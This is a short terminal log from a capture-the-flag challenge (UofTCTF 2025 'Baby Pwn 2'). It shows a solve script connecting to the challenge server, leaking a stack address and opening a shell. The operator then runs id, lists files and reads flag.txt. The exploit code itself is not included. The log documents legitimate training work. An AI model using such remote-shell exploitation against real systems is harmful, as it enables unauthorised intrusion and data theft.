mito@mito-virtual-machine:~/CTF/UofTCTF_2025/Pwn_Baby_Pwn_2$ python3 solve.py r
[+] Opening connection to 34.162.119.16 on port 5000: Done
stack_leak = 0x7fff90419f20
[*] Switching to interactive mode
$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu)
$ ls -l
total 28
-rwxr-xr-x 1 nobody nogroup 15728 Jan  7 03:30 baby-pwn-2
-rw-r--r-- 1 nobody nogroup   378 Jan  7 03:31 baby-pwn-2.c
-rw-r--r-- 1 nobody nogroup    34 Jan  7 03:31 flag.txt
-r-xr-xr-x 1 nobody nogroup    22 Jan  7 03:31 run
$ cat flag.txt
uoftctf{sh3llc0d3_1s_pr3tty_c00l}
